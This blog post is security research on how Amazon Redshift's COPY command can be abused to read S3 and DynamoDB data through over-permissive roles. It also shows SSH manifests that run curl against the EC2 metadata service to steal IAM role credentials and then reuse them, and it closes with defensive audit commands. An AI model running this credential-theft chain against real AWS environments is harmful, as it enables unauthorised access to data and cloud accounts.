
Amazon Redshift – COPY The Risk

Dana Tsymberg
Wednesday, Mar 30th, 2022

TL;DR

Amazon Redshift is a fully managed, petabyte-scale data warehouse service in the cloud, designed specifically for online analytical processing (OLAP) and business intelligence (BI) applications, which require complex queries against large datasets. Redshift is a powerful service that integrates with many data sources, some of which might include sensitive information. Therefore, it is important to understand the connections between the services and the potential attack surface.

In this post we are going to examine several ways an attacker could potentially access your sensitive data using the Redshift COPY command.

Redshift manages the process of creating, operating, and scaling a data warehouse. It provides the option to interact with data stored in S3 or DynamoDB, as well as Athena and Glue using Redshift Spectrum. The service is based on PostgreSQL, but some of the commands are implemented differently.

Why does Redshift require roles?

As mentioned above, Redshift can integrate with many AWS services. To do so, it uses the roles that are associated with the cluster. The classic example is loading data from an S3 bucket. Redshift uses the 'COPY' command. The COPY command leverages the Amazon Redshift massively parallel processing (MPP) architecture to read and load data in parallel from data files. The files can be located in an Amazon Simple Storage Service (Amazon S3) bucket, an Amazon EMR cluster, or a remote host that is accessed using a Secure Shell (SSH) connection.

Redshift permits up to 50 IAM roles to be associated with a cluster (up to 10 in several AWS regions mentioned here). Any of these roles can be used for data processing, but if a wrong policy is attached to one of them, it may lead to excessive data access.
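For context, this is how a role typically gets attached to a cluster; a minimal AWS CLI sketch, assuming an illustrative cluster identifier of 'my-redshift-cluster' and the account ID used throughout this post:

aws redshift modify-cluster-iam-roles \
  --cluster-identifier my-redshift-cluster \
  --add-iam-roles arn:aws:iam::123456789111:role/Role1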

In the following two examples, we will examine how an attacker can access data stored in S3 and DynamoDB. We will use a simple .csv file that includes customer records (id, name, last name, city, country and occupation). We associated two roles with the cluster:

  • Role1: contains an inline policy related to S3
  • Role2: contains an inline policy related to DynamoDB

Using Redshift to read S3 content

Redshift can load data from S3 and analyze it using SQL. The general template for loading data using the COPY command looks like this:

copy <table-name> from 's3://<your-bucket-name>/<folder>/<key_prefix>'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
options;

To use the COPY command successfully, the role used by COPY must have LIST access to the bucket and GET access to the bucket objects. For this example, we are using 'Role1' with the following policy:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "VisualEditor0",
      "Effect": "Allow",
      "Action": [
        "s3:GetObject",
        "s3:ListBucket"
      ],
      "Resource": "*"
    }
  ]
}

To read all the content of customers.csv, we enter the following command:

copy customers from 's3://customers-bucket-1/load/customers.csv'
iam_role 'arn:aws:iam::123456789111:role/Role1'
DELIMITER ','
IGNOREHEADER 1;

We can see that the data was loaded successfully into the 'customers' table. The next step is to query the data. Using a simple SQL command - 'SELECT * FROM customers;' - we can see all of the data.


Using Redshift to read a DynamoDB table

As mentioned in Amazon's documentation, Redshift can load data from DynamoDB as well.

To do so, an attacker will first need to understand which tables are available in DynamoDB. The available tables can be listed using the following AWS CLI command:

aws dynamodb list-tables

To demonstrate how to load data from DynamoDB, we will be using the same dataset from the example above. The dataset's columns and their data types can be inspected using the following AWS CLI command:

aws dynamodb scan --table-name customers

Each attribute value is described as a name-value pair. The name is the data type, and the value is the data itself. The name 'S' represents a string (other data types include 'N' - number, 'B' - binary, 'SS' - string set, etc.).

Now that we have a better understanding of the data types, we can proceed to creating the table in Redshift. The new table will be called 'newcustomers':

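A minimal sketch of the table definition, assuming column names and types that mirror the CSV fields described earlier (the varchar lengths are illustrative):

create table newcustomers (
  id integer,
  name varchar(50),
  last_name varchar(50),
  city varchar(50),
  country varchar(50),
  occupation varchar(100)
);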

To read data from DynamoDB we will use this template:

copy <redshift_tablename> from 'dynamodb://<dynamodb_table_name>'
authorization readratio '<integer>';

The values for authorization are the AWS credentials needed to access the Amazon DynamoDB table. The user must have permission to SCAN and DESCRIBE the Amazon DynamoDB table that is being loaded.

The policy that is attached to 'Role2':

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "VisualEditor0",
      "Effect": "Allow",
      "Action": [
        "dynamodb:DescribeTable",
        "dynamodb:Scan"
      ],
      "Resource": "*"
    }
  ]
}

We modified the template to load the 'customers' DynamoDB table into 'newcustomers' using 'Role2':

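A filled-in version of the command might look like the following sketch (the readratio value is illustrative):

copy newcustomers from 'dynamodb://customers'
iam_role 'arn:aws:iam::123456789111:role/Role2'
readratio 50;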

Now that the data is loaded into the table, an attacker can simply query it using SQL:

SELECT * FROM newcustomers;

Using Redshift to run commands on EC2 instances

The 'COPY' command can be used to load data from remote hosts as well, such as EC2 instances or other computers. COPY connects to the remote hosts using SSH and runs commands on the remote hosts to generate text outputs. The remote host can be an Amazon EC2 Linux Instance, or another Unix computer configured to accept SSH connections.

To connect to a remote host and run commands, an attacker will need to craft a manifest file containing endpoint details of the host and the command.

The manifest file has the following format:

{
  "entries":
  [
    {
      "endpoint": "<ssh_endpoint_or_IP>",
      "command": "<remote_command>",
      "mandatory": true,
      "publickey": "<public_key>",
      "username": "<host_user_name>"
    }
  ]
}

In the example below, we will try to extract the credentials of the role that is attached to our EC2 instance. To do so, we crafted the manifest file below to include the following entries:

{
  "entries":
  [
    {
      "endpoint": "ec2-11-222-333-44.compute-1.amazonaws.com",
      "command": "curl -fsS http://169.254.169.254/latest/meta-data/iam/security-credentials/",
      "mandatory": true,
      "username": "ec2-user"
    }
  ]
}

The command can be anything from a simple echo to querying a database or launching a script. In this example, since we are trying to extract credentials, we query the EC2 instance metadata service using the following command:

curl -fsS http://169.254.169.254/latest/meta-data/iam/security-credentials/

In order to successfully load the data from the instance, we will first need to create a table in the Redshift cluster using the following command:

create table metadata (data text);


To use the manifest file, it must be uploaded to an S3 bucket. In this example the file was uploaded to a bucket called "dana-redshift-research".
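Assuming the manifest was saved locally as 'ssh_manifest', uploading it is a single AWS CLI call:

aws s3 cp ssh_manifest s3://dana-redshift-research/ssh_manifest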

Next, we used the copy command to load the manifest and create the SSH connection using the following command:

copy metadata
from 's3://dana-redshift-research/ssh_manifest' iam_role
'arn:aws:iam::123456789111:role/Role1'
TRUNCATECOLUMNS
ssh;

We received a confirmation message that the data was loaded successfully.


Now, we can check the role that is attached to the EC2 instance by querying the table:

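The query follows the same pattern as before:

SELECT * FROM metadata;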

Great! Now that we have the role name, we can reuse the curl command from the first manifest file, this time with the role name appended to the end of the URL:

{
  "entries":
  [
    {
      "endpoint": " ec2-11-222-333-44.compute-1.amazonaws.com",
      "command": "curl -fsS http://169.254.169.254/latest/meta-data/iam/security-credentials/dana-redshift-role",
      "mandatory": true,
      "username": "ec2-user"
    }
  ]
}

After uploading the file to the S3 bucket and repeating the last two commands of loading the data using the copy command and querying the table, we can finally get the access key, secret access key, and token.


With these credentials, an attacker can configure a profile using 'aws configure' and access whatever assets the role permits.
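Alternatively, the stolen credentials can simply be exported as environment variables; a minimal sketch with placeholder values:

# placeholder values - use the access key, secret key, and token returned by the metadata service
export AWS_ACCESS_KEY_ID=<access_key>
export AWS_SECRET_ACCESS_KEY=<secret_access_key>
export AWS_SESSION_TOKEN=<session_token>

# verify the assumed identity
aws sts get-caller-identity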

Conclusion

Redshift is a great service for analyzing structured and semi-structured data.
To prevent unwanted access to sensitive data, it is important to understand how the service works and to pay close attention to the roles associated with the cluster and their policies.

How can you check your environment?

Prerequisites: the AWS CLI configured, jq installed, and (for the second check) the target EC2 instances managed by AWS Systems Manager (SSM).

Check which roles are associated with your Redshift Cluster:

aws redshift describe-clusters | jq '.Clusters[] | .ClusterIdentifier, .IamRoles'

Check which EC2 instances contain Amazon Redshift public keys:

aws ssm send-command --document-name "AWS-RunShellScript" --targets <value> --parameters '{"commands":["#!/bin/bash","cd .ssh && cat authorized_keys"],"workingDirectory":["/home/<ssh_username>"],"executionTimeout":["3600"]}'

Where --targets <value> is a comma-separated list of EC2 instances and <ssh_username> is the username on the instance (usually "ec2-user").
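For example, the targets can be specified by instance ID (the ID below is a placeholder):

--targets "Key=instanceids,Values=i-0123456789abcdef0"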

Once the command is executed:

aws ssm get-command-invocation --command-id <value> --instance-id <value> | jq '. as $p | .StandardOutputContent as $d | select($d | contains("Amazon-Redshift")) | if . then {"result": true, "match": .InstanceId} else {"result": false} end'

If the instance contains the public key of the Redshift cluster the output will be:

{
  "result": true,
  "match": "<instanceId>"
}

If the instance does not contain the public key of the Redshift cluster there will be no output.
